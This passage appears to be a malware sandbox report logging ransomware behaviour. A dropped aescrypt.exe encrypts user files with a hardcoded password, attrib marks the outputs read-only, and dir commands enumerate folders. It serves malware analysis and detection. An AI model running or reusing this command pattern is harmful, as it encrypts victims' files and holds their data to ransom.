C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT.lck" "NTUSER.DAT"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Admin.contact.lck" "Admin.contact"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Admin.contact.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Pay2Decrypt54.txt.lck" "Pay2Decrypt54.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Pay2Decrypt54.txt.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "These.docx.lck" "These.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "These.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Are.docx.lck" "Are.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Are.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Recently.docx.lck" "Recently.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Recently.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Opened.docx.lck" "Opened.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Opened.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Files.docx.lck" "Files.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Files.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugRestart.dot.lck" "DebugRestart.dot"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "DebugRestart.dot.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectSend.dotm.lck" "UnprotectSend.dotm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectSend.dotm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectConnect.rtf.lck" "UnprotectConnect.rtf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectConnect.rtf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectInitialize.pptm.lck" "ProtectInitialize.pptm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ProtectInitialize.pptm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddInvoke.docm.lck" "AddInvoke.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "AddInvoke.docm.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RedoConnect.html.lck" "RedoConnect.html"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RedoConnect.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendUnlock.xps.lck" "SendUnlock.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "SendUnlock.xps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmRestart.vsx.lck" "ConfirmRestart.vsx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConfirmRestart.vsx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeEdit.pub.lck" "RevokeEdit.pub"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RevokeEdit.pub.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMeasure.vdx.lck" "NewMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NewMeasure.vdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockUninstall.pdf.lck" "UnblockUninstall.pdf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnblockUninstall.pdf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TestDismount.vsw.lck" "TestDismount.vsw"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "TestDismount.vsw.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeFind.xlt.lck" "InvokeFind.xlt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeCompress.pptx.lck" "InvokeCompress.pptx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InvokeFind.xlt.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +r "InvokeCompress.pptx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchRemove.docm.lck" "SearchRemove.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "SearchRemove.docm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeEdit.vdx.lck" "InitializeEdit.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InitializeEdit.vdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestExport.vsd.lck" "RequestExport.vsd"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RequestExport.vsd.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutGroup.vsdx.lck" "OutGroup.vsdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "OutGroup.vsdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearMeasure.vdx.lck" "ClearMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ClearMeasure.vdx.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveWait.ico.lck" "ReceiveWait.ico"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReceiveWait.ico.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnregisterOptimize.xps.lck" "UnregisterOptimize.xps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnregisterOptimize.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveImport.php.lck" "ApproveImport.php"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ApproveImport.php.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteRename.xlt.lck" "WriteRename.xlt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteRename.xlt.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceInitialize.ppsm.lck" "TraceInitialize.ppsm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceInitialize.ppsm.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopRemove.scf.lck" "PopRemove.scf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PopRemove.scf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockBlock.lock.lck" "UnlockBlock.lock"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnlockBlock.lock.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertUnprotect.potm.lck" "ConvertUnprotect.potm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertUnprotect.potm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisableDismount.html.lck" "DisableDismount.html"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisableDismount.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UseDisconnect.ppsx.lck" "UseDisconnect.ppsx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UseDisconnect.ppsx.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectSave.vst.lck" "ConnectSave.vst"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectSave.vst.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMove.dib.lck" "NewMove.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "NewMove.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterSave.ocx.lck" "RegisterSave.ocx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RegisterSave.ocx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetLimit.pptx.lck" "GetLimit.pptx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "GetLimit.pptx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeOpen.wdp.lck" "InvokeOpen.wdp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "InvokeOpen.wdp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockResume.xlt.lck" "UnblockResume.xlt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnblockResume.xlt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.wmv.lck" "TraceRead.wmv"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.wmv.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendExpand.wmf.lck" "SendExpand.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SendExpand.wmf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectApprove.xlsx.lck" "ConnectApprove.xlsx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectApprove.xlsx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RemoveDisconnect.vstx.lck" "RemoveDisconnect.vstx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RemoveDisconnect.vstx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResetWait.css.lck" "ResetWait.css"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResetWait.css.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartEnable.shtml.lck" "StartEnable.shtml"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "StartEnable.shtml.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PushClear.mpe.lck" "PushClear.mpe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PushClear.mpe.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddMove.jpg.lck" "AddMove.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "AddMove.jpg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameConvertFrom.midi.lck" "RenameConvertFrom.midi"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RenameConvertFrom.midi.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDismount.DVR-MS.lck" "RevokeDismount.DVR-MS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDismount.DVR-MS.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveDisable.nfo.lck" "ApproveDisable.nfo"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ApproveDisable.nfo.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishSelect.otf.lck" "PublishSelect.otf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PublishSelect.otf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncConfirm.svg.lck" "SyncConfirm.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SyncConfirm.svg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SavePing.vst.lck" "SavePing.vst"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SavePing.vst.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditWrite.pub.lck" "EditWrite.pub"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EditWrite.pub.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RecentPlaces.lnk.lck" "RecentPlaces.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RecentPlaces.lnk.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Desktop.lnk.lck" "Desktop.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Desktop.lnk.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
